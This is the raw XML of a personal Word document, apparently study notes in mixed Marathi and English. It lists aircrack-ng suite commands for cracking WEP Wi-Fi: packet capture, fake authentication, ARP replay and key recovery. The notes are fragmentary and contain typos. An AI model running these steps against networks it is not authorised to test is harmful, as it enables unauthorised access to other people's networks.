    <w:p w14:paraId="66C77D3C" w14:textId="7E96E493" w:rsidR="00613AB2" w:rsidRDefault="00613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Airodump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>*********- - channel ***** - - write filename wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F4D5E" w14:textId="704CDE0C" w:rsidR="00613AB2" w:rsidRDefault="00613AB2">
      <w:p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chalu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deyycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> side by side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0224B0" w14:textId="028027ED" w:rsidR="00613AB2" w:rsidRDefault="00613AB2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Next window </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>madhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E2DA587" w14:textId="438280D7" w:rsidR="00613AB2" w:rsidRDefault="00613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 xml:space="preserve">-ng – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fakeauth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 -a*mac address of WEP network* -h*mac address of wireless adopter (first 12 digit …remove – and put semi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>coloon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)* wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526A16D" w14:textId="5AB3A763" w:rsidR="00613AB2" w:rsidRDefault="00613AB2">
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB1194">
        <w:t xml:space="preserve">3dr window </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB1194">
        <w:t>madhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01D56ACA" w14:textId="4006E049" w:rsidR="00AB1194" w:rsidRDefault="00AB1194">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aireplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">—ng – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arpreplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -b *mac address of WEP network* -h * mac address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wirelesss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> adopter * wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158F5EC" w14:textId="646D505B" w:rsidR="00AB1194" w:rsidRDefault="00AB1194">
      <w:r>
        <w:t xml:space="preserve">Parat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ekda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fake authentication </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>karun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gheycha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="236FDED2" w14:textId="5B9326A6" w:rsidR="00AB1194" w:rsidRDefault="00AB1194">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Aircrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-ng </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>filename.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77E8035B" w14:textId="77777777" w:rsidR="00AB1194" w:rsidRDefault="00AB1194"/>
    <w:p w14:paraId="269D6ABE" w14:textId="77777777" w:rsidR="00301985" w:rsidRDefault="00301985"/>
    <w:p w14:paraId="36F55976" w14:textId="51BD4F5D" w:rsidR="00301985" w:rsidRDefault="00301985">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tkip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encription</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75D9B648" w14:textId="5839E21A" w:rsidR="00301985" w:rsidRDefault="00301985">
      <w:r>
        <w:t xml:space="preserve">And </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ccma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D32476B" w14:textId="77777777" w:rsidR="00301985" w:rsidRPr="00AB1194" w:rsidRDefault="00301985"/>
    <w:p w14:paraId="4A153D5C" w14:textId="77777777" w:rsidR="00613AB2" w:rsidRPr="00613AB2" w:rsidRDefault="00613AB2" w:rsidP="00AB1194">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00613AB2" w:rsidRPr="0061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28"/>
    <w:rsid w:val="00001B6A"/>
    <w:rsid w:val="00091BA5"/>
    <w:rsid w:val="00245718"/>
    <w:rsid w:val="00301985"/>
    <w:rsid w:val="00326C60"/>
    <w:rsid w:val="004E0C9C"/>
    <w:rsid w:val="005D62AB"/>
    <w:rsid w:val="00613AB2"/>
    <w:rsid w:val="006C74A6"/>
    <w:rsid w:val="006D5E8C"/>
    <w:rsid w:val="00843DF2"/>
    <w:rsid w:val="00867E3B"/>
    <w:rsid w:val="00A107E0"/>
    <w:rsid w:val="00AB1194"/>
    <w:rsid w:val="00E67D7B"/>
    <w:rsid w:val="00EB2B28"/>
    <w:rsid w:val="00F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72BE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{74E3639B-D3C5-467E-B441-62F36D38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netke</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>digvijay netke</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-05T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-07T16:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>